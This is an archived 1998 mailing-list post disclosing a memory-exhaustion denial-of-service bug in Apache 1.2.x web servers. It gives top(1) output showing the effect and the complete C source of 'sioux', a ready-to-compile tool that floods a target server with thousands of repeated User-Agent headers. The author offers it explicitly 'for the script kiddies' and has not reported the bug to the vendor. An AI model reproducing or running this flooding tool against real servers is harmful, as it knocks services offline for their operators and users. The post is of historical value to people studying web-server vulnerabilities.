There seems to be a simple way of badly DoSing any Apache server. It
involved a massive memory leak in the way it handles incoming request
headers. I based my exploit on the assumption that they use setenv()
(which they don't) and that the bug occurs when you send a header that
will end up as an environment variable if you request a CGI script
(such as User-Agent), but I have since verified that there is no
connection there. Anyway, you can blow Apache through the roof by
sending it tons of headers - the server's memory consumption seems to
be a steep polynomial of the amount of data you send it. Below is a
snapshot of top(1) about one minute after I sent my server a request
with 10,000 copies of "User-Agent: sioux\r\n" (totalling 190,016 bytes
of data)
---cut---
last pid: 29187; load averages: 1.82, 1.06, 0.68 18:21:36
82 processes: 2 running, 80 sleeping
CPU states: 93.5% user, 0.0% nice, 6.1% system, 0.4% interrupt, 0.0% idle
Mem: 82M Active, 5692K Inact, 31M Wired, 4572K Cache, 8349K Buf, 616K Free
Swap: 512M Total, 402M Used, 110M Free, 79% Inuse, 5412K In, 748K Out
PID USERNAME PRI NICE SIZE RES STATE TIME WCPU CPU COMMAND
29176 www -18 0 392M 85612K swread 0:57 6.83% 6.83% httpd
---cut---
I know that there are many trivial ways of overloading a web server
(e.g. opening tons of connection to eat up file descriptors and
process slots), but this one seemed a little extreme, to say the
least.
Please note that I've only tested this on Apache 1.2.5 and 1.2.6, not
on 1.3.1. However, there is no mention of this bug in the change log
for 1.3.1, so I'll assume it's vulnerable.
BTW, how can the Apache team be stupid enough not to provide a way of
submitting problem reports by email? If they did, I'd've sent this to
them first and given them a week, but they don't and I'm too friggin'
lazy to use their web interface...
Here's the 'sploit for the script kiddies. It should compile cleanly
and work on most Unices. These are the ones I've tested it on:
FreeBSD 2.2.x, FreeBSD 3.0, IRIX 5.3, IRIX 6.2:
gcc -o sioux sioux.c
Solaris 2.5.1:
gcc -o sioux sioux.c -lsocket -lnsl
---cut---
/*-
* Copyright (c) 1998 Dag-Erling Coïdan Smørgrav
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer
* in this position and unchanged.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. The name of the author may not be used to endorse or promote products
* derived from this software withough specific prior written permission
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
* IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
* OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
* IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
* THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
*/
/*
* Kudos to Mark Huizer who originally suggested this on freebsd-current
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
void
usage(void)
{
fprintf(stderr, "usage: sioux [-a address] [-p port] [-n num]\n");
exit(1);
}
int
main(int argc, char *argv[])
{
struct sockaddr_in sin;
struct hostent *he;
FILE *f;
int o, sd;
/* default parameters */
char *addr = "localhost";
int port = 80;
int num = 1000;
/* get options */
while ((o = getopt(argc, argv, "a:p:n:")) != EOF)
switch (o) {
case 'a':
addr = optarg;
break;
case 'p':
port = atoi(optarg);
break;
case 'n':
num = atoi(optarg);
break;
default:
usage();
}
if (argc != optind)
usage();
/* connect */
if ((he = gethostbyname(addr)) == NULL) {
perror("gethostbyname");
exit(1);
}
bzero(&sin, sizeof(sin));
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family = he->h_addrtype;
sin.sin_port = htons(port);
if ((sd = socket(sin.sin_family, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("socket");
exit(1);
}
if (connect(sd, (struct sockaddr *)&sin, sizeof(sin)) == -1) {
perror("connect");
exit(1);
}
if ((f = fdopen(sd, "r+")) == NULL) {
perror("fdopen");
exit(1);
}
/* attack! */
fprintf(stderr, "Going down like a plague of locusts on %s\n", addr);
fprintf(f, "GET / HTTP/1.1\r\n");
while (num-- && !ferror(f))
fprintf(f, "User-Agent: sioux\r\n");
if (ferror(f)) {
perror("fprintf");
exit(1);
}
fclose(f);
exit(0);
}
---cut---
DES
--
Dag-Erling Smørgrav -- finrodat_private
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:11:43 PDT